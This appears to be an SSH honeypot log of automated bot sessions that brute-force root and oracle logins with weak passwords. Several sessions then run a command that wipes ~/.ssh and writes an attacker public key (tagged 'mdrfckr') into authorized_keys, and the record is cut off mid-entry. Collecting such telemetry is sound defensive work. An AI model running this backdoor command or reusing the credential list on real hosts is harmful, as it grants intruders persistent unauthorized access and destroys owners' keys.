2.57.122.150
2026-06-30 16:30:32.208154 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 609a714de5ac
Client Version: Unknown
Engagement Duration: 0.2s
{
  "id": "609a714de5ac",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T16:30:32.208154Z",
  "end_time": "2026-06-30T16:30:32.375911Z",
  "duration": "0.2",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
46.147.113.91
2026-06-30 16:29:43.045033 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 6720a7c1b5ed
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.5s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "6720a7c1b5ed",
  "src_ip": "46.147.113.91",
  "start_time": "2026-06-30T16:29:43.045033Z",
  "end_time": "2026-06-30T16:29:44.512271Z",
  "duration": "1.5",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
46.147.113.91
2026-06-30 16:29:40.475415 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: e6836f2957c9
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.3s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "e6836f2957c9",
  "src_ip": "46.147.113.91",
  "start_time": "2026-06-30T16:29:40.475415Z",
  "end_time": "2026-06-30T16:29:42.808187Z",
  "duration": "2.3",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
46.147.113.91
2026-06-30 16:29:37.751243 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 222000

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 4f91ee020e43
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 6.8s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "4f91ee020e43",
  "src_ip": "46.147.113.91",
  "start_time": "2026-06-30T16:29:37.751243Z",
  "end_time": "2026-06-30T16:29:44.508331Z",
  "duration": "6.8",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "222000"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:29:12.525036 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 19c471d51742
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 0.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "19c471d51742",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:29:12.525036Z",
  "end_time": "2026-06-30T16:29:13.397777Z",
  "duration": "0.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:29:10.469442 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: fedb6ebae629
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "fedb6ebae629",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:29:10.469442Z",
  "end_time": "2026-06-30T16:29:12.399581Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:29:08.063721 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / admin_2024

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 0d2551b6b6b0
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 5.3s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "0d2551b6b6b0",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:29:08.063721Z",
  "end_time": "2026-06-30T16:29:13.401571Z",
  "duration": "5.3",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "admin_2024"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:28:44.829168 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 4e552ba91836
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "4e552ba91836",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:28:44.829168Z",
  "end_time": "2026-06-30T16:28:45.900615Z",
  "duration": "1.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:28:42.580213 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 0b83907856ef
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "0b83907856ef",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:28:42.580213Z",
  "end_time": "2026-06-30T16:28:44.660167Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:28:40.253490 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 123456789!

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: e1de4c990b7b
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 5.6s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "e1de4c990b7b",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:28:40.253490Z",
  "end_time": "2026-06-30T16:28:45.897643Z",
  "duration": "5.6",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123456789!"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
46.147.113.91
2026-06-30 16:27:47.274796 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: Administrator

Record ID: 69e7297b750b
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "69e7297b750b",
  "src_ip": "46.147.113.91",
  "start_time": "2026-06-30T16:27:47.274796Z",
  "end_time": "2026-06-30T16:27:49.497161Z",
  "duration": "2.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "Administrator",
      "pass": "Administrator"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:26:46.423453 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: oracle / 3245gs5662d34

Record ID: d718e3a1affb
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "d718e3a1affb",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:26:46.423453Z",
  "end_time": "2026-06-30T16:26:47.494342Z",
  "duration": "1.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "oracle",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:26:44.182819 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: ade13fb36c31
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "ade13fb36c31",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:26:44.182819Z",
  "end_time": "2026-06-30T16:26:46.254509Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:26:41.963035 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: oracle / Oracle123

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 5969ef617e6b
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 5.5s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "5969ef617e6b",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:26:41.963035Z",
  "end_time": "2026-06-30T16:26:47.491430Z",
  "duration": "5.5",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "oracle",
    "pass": "Oracle123"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
83.235.16.111
2026-06-30 16:26:33.067036 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: oracle / 3245gs5662d34

Record ID: e4b7e2239453
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "e4b7e2239453",
  "src_ip": "83.235.16.111",
  "start_time": "2026-06-30T16:26:33.067036Z",
  "end_time": "2026-06-30T16:26:34.241223Z",
  "duration": "1.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "oracle",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
83.235.16.111
2026-06-30 16:26:30.734556 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 10fb497fec5a
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "10fb497fec5a",
  "src_ip": "83.235.16.111",
  "start_time": "2026-06-30T16:26:30.734556Z",
  "end_time": "2026-06-30T16:26:32.875236Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
83.235.16.111
2026-06-30 16:26:28.358815 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: oracle / Oracle123

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 11b7a895fa73
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 5.9s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "11b7a895fa73",
  "src_ip": "83.235.16.111",
  "start_time": "2026-06-30T16:26:28.358815Z",
  "end_time": "2026-06-30T16:26:34.236644Z",
  "duration": "5.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "oracle",
    "pass": "Oracle123"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
